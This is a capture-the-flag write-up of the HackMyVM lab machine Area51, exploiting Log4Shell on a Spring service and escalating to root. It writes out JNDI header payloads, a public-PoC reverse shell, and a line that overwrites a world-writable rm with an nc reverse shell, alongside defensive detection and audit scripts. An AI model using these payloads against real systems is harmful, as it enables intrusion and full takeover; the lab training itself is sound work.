Area51 – Writeup – Log4Shell – HackMyVM
Area51 is an easy machine built around the recent 0-day vulnerability in the Log4j logging library. This is one of the vulnerabilities that had a large impact worldwide and affected many enterprises. I would also like to extend a huge thanks to the author bitc0de for this. The machine is fairly simple once we get the foothold. So, let’s start the writeup.
Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Area51
Step 1: Get the IP address
As usual, I began enumeration by identifying the IP address of the target machine.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.5
Here, the IP address of my Kali machine is 10.0.0.4 and that of the target is 10.0.0.5. (The IP range starts from the beginning again because I recently switched to Fedora 35 and created a new NAT network in VirtualBox. Please leave a comment if you are a fan of Fedora.)
Step 2: Scan ports using nmap
Next, I checked the open ports on the target that we can access from the network.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-01 19:28 +0545
Nmap scan report for 10.0.0.5
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
| 256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_ 256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: FBI Access
|_http-server-header: Apache/2.4.51 (Debian)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As we can see above, there are two HTTP services. The one on port 80 is Apache, whereas the one on port 8080 is a Spring application (even though nmap guessed nagios-nsca). We can identify this from the “Whitelabel Error Page” text it returns.
Step 3: Directory busting using gobuster
The website is pretty static, so I performed directory busting on port 80.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.5 -x php,html,txt -o medium.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.5
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2022/01/01 19:30:25 Starting gobuster in directory enumeration mode
===============================================================
/video (Status: 301) [Size: 304] [--> http://10.0.0.5/video/]
/index.html (Status: 200) [Size: 1131]
/radar (Status: 301) [Size: 304] [--> http://10.0.0.5/radar/]
/note.txt (Status: 200) [Size: 119]
/moon (Status: 301) [Size: 303] [--> http://10.0.0.5/moon/]
We have a note.txt that hints at the Log4j vulnerability.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ curl http://10.0.0.5/note.txt
Alert!
We have a vulnerability in our java application...
Notify the programming department to check Log4J.
-Admin
Step 4: Check Java Application on port 8080
At first, I was testing the exploit only on the “User-Agent” header. However, the vulnerable header was actually “X-Api-Version”. I got this information from the website https://log4j-tester.trendmicro.com/. There are other tools that help us test for the vulnerability, such as https://log4shell.tools.
Anyway, I also tested it manually from my own machine. For this, I listened on port 9001.
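A defensive counterpart to that check, added here as an example and not part of the original writeup or of the tools mentioned: it collapses the nested Log4j lookups commonly used to hide a JNDI probe and then inspects every request header, not only User-Agent, which is exactly the mistake described above. The sample requests are constructed, not captured from the machine.

```python
import re

# Lookup forms Log4j 2.x resolves that are commonly used to hide "${jndi:":
#   ${lower:J}     -> "j"     ${upper:j}  -> "J"
#   ${::-j}        -> "j"     (empty lookup, default value after ":-")
#   ${env:NOPE:-j} -> "j"     (missing variable, default value)
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

def _resolve_one(body: str) -> str:
    """Resolve one innermost ${...} the way Log4j would, for the lookups
    that matter for de-obfuscation; anything else is left untouched."""
    name, _, rest = body.partition(":")
    if name.lower() == "lower":
        return rest.lower()
    if name.lower() == "upper":
        return rest.upper()
    if ":-" in body:                      # unknown variable -> default value
        return body.split(":-", 1)[1]
    return "${" + body + "}"              # e.g. ${jndi:...}, ${hostName}

def normalize_lookups(value: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(lambda m: _resolve_one(m.group(1)), value)
        if new == value:
            break
        value = new
    return value

def is_log4shell_probe(value: str) -> bool:
    """True if the header value contains a JNDI lookup after de-obfuscation."""
    return "${jndi:" in normalize_lookups(value).lower()

def find_probe_headers(headers: dict) -> list:
    """Names of request headers carrying a JNDI lookup. Every header is
    checked, not just User-Agent, since here the hit was in X-Api-Version."""
    return [name for name, value in headers.items() if is_log4shell_probe(value)]

# Constructed sample requests (not captured from the machine):
SAMPLE_REQUESTS = [
    {"User-Agent": "curl/7.80.0",
     "X-Api-Version": "${jndi:ldap://10.0.0.4:9001/nepcodex}"},
    {"User-Agent": "Mozilla/5.0",
     "X-Api-Version": "${${lower:j}${::-n}di:ldap://10.0.0.4:1389/a}"},
    {"User-Agent": "Mozilla/5.0", "X-Api-Version": "1.0"},
]
```

The same normalizer can be run over any logged header or JSON body field; a plain substring match for `${jndi:` misses the second sample entirely.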
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Then, I sent the payload as follows.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ curl http://10.0.0.5:8080 -H 'X-Api-Version: ${jndi:ldap://10.0.0.4:9001/nepcodex}'
I got a connection.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:60098.
0
`�
The connection back to my listener means the application really is vulnerable to Log4Shell: the JNDI lookup in the header was evaluated, and the application tried to talk LDAP to my netcat (the stray bytes above are the start of its LDAP bind request). For the exploitation part, I tried to use JNDI Exploit Kit and a modified ysoserial. However, I wasn’t successful. If you were able to get a shell that way, please leave a comment on how you did it.
Nevertheless, the following exploit PoC worked.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ git clone https://github.com/kozmer/log4j-shell-poc.git
We have to follow the README carefully. It says that we have to download a particular JDK version, and the repo owner has pasted the link in the README file. I copied the JDK into the directory of the exploit.
┌──(kali㉿kali)-[~/hackmyvm/area51/log4j-shell-poc]
└─$ python3 poc.py --userip 10.0.0.4
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://10.0.0.4:1389/a}
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on 0.0.0.0:1389
Here, we can see that the PoC’s LDAP server is listening on port 1389, with a web server on port 8000 serving the payload class.
┌──(kali㉿kali)-[~/hackmyvm/area51/log4j-shell-poc]
└─$ curl 'http://10.0.0.5:8080' -H 'X-Api-Version: ${jndi:ldap://10.0.0.4:1389/a}'
This gives us a reverse shell, but inside a Docker container. Furthermore, it is an Alpine image, so we don’t have enough binaries to get a proper shell.
Step 5: Get the password for the user roger
With the reverse shell, I carefully used linpeas.sh to identify a file that contains the password.
On my local machine, I used netcat to push the file.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ nc -nlvp 9001 < ~/linpeas.sh
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Then, I used netcat on the target to put the file in the /tmp directory.
nc 10.0.0.4 9001 > /tmp/linpeas.sh
cd /tmp
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.out | more
In the output, I saw the file that has the password.
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 10 Dec 19 19:19 /var/tmp/.roger
Step 6: Get the password of kang
I logged in to the user roger using SSH.
┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ ssh roger@10.0.0.5
roger@10.0.0.5's password:
Linux area51 5.10.0-10-amd64 #1 SMP Debian 5.10.84-1 (2021-12-08) x86_64
# SNIP
Last login: Tue Dec 21 08:03:09 2021 from 192.168.1.43
Your input:
^Croger@area51:~$ ls
shoppingList SubjectDescription user.txt
roger@area51:~$ id
uid=1001(roger) gid=1001(roger) groups=1001(roger)
To get rid of the “Your input:” prompt, I simply pressed Ctrl+C. Then, I transferred linpeas.sh and pspy64 using a Python web server; I won’t be explaining this step. linpeas.sh also showed me a file that contained the password for the user kang.
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/pam.d/kang
In addition to this information, we can also see that the binary “/usr/bin/rm” is writable by everyone.
#)You_can_write_even_more_files_inside_last_directory
/usr/bin/rm
This piece of information is important once we switch to the user kang.
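The world-writable rm finding translates into a simple audit a defender can run on any host. The following is an added example, not the author’s code or linpeas output; the fake bin directory it builds is a constructed fixture that mimics a world-writable rm next to a normal binary.

```python
import os
import stat
import tempfile

def world_writable_binaries(dirs):
    """Return regular files in the given directories that any user may
    write to (mode bit S_IWOTH). Symlinks are skipped because lstat is used."""
    hits = []
    for d in dirs:
        try:
            names = os.listdir(d)
        except OSError:
            continue            # directory missing or unreadable
        for name in names:
            path = os.path.join(d, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)

def audit_path():
    """Audit every directory on the current PATH, which is where a root
    cron job or script like weComeInPeace.sh resolves plain command names."""
    return world_writable_binaries(os.environ.get("PATH", "").split(":"))

def demo():
    """Constructed fixture: a fake bin directory with an 'rm' that is
    world-writable (like /usr/bin/rm on this box) and a sane 'ls'."""
    d = tempfile.mkdtemp(prefix="fakebin-")
    for name, mode in (("rm", 0o777), ("ls", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    return [os.path.basename(p) for p in world_writable_binaries([d])]
```

On a healthy Debian box audit_path() should return an empty list; anything it reports is a binary that any local user can turn into root code the next time a privileged job calls it.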
Step 7: Get the root shell
After I got the shell of kang, I checked the processes using pspy64.
2022/01/01 09:18:17 CMD: UID=0 PID=21123 | sh /kang/weComeInPeace.sh
2022/01/01 09:18:17 CMD: UID=0 PID=21124 | sleep 1
2022/01/01 09:18:18 CMD: UID=0 PID=21126 | sleep 2
2022/01/01 09:18:20 CMD: UID=0 PID=21128 | sleep 1
2022/01/01 09:18:21 CMD: UID=0 PID=21130 | sleep 2
2022/01/01 09:18:23 CMD: UID=0 PID=21132 | sleep 1
2022/01/01 09:18:24 CMD: UID=0 PID=21134 | sleep 2
2022/01/01 09:18:26 CMD: UID=0 PID=21136 | sleep 1
Here, “sleep” commands are issued right after the “weComeInPeace.sh” script in the home directory of kang is run as root (UID=0). So, when I checked the home directory, I found that a file was being created and removed regularly.
kang@area51:~$ ls -al
total 12
drwxrwx--- 3 kang kang 4096 Jan 1 09:19 .
drwxr-xr-x 19 root root 4096 Dec 19 15:49 ..
lrwxrwxrwx 1 root root 9 Dec 19 18:16 .bash_history -> /dev/null
drwxr-xr-x 3 kang kang 4096 Dec 21 07:43 .local
Thus, I figured we could overwrite the “rm” binary, since it is writable by everyone, to get our own shell when the root script calls it. For this, I will once again catch a reverse shell on port 9001. So, as you guessed, I am already listening on port 9001.
kang@area51:~$ echo 'nc -e /bin/bash 10.0.0.4 9001' > /usr/bin/rm
After some time, I got the shell.
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:35926.
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@area51:/# echo nepcodex.com
echo nepcodex.com
nepcodex.com
root@area51:/#
If you want to upgrade the shell, check the following guide.
Upgrade to an intelligent reverse shell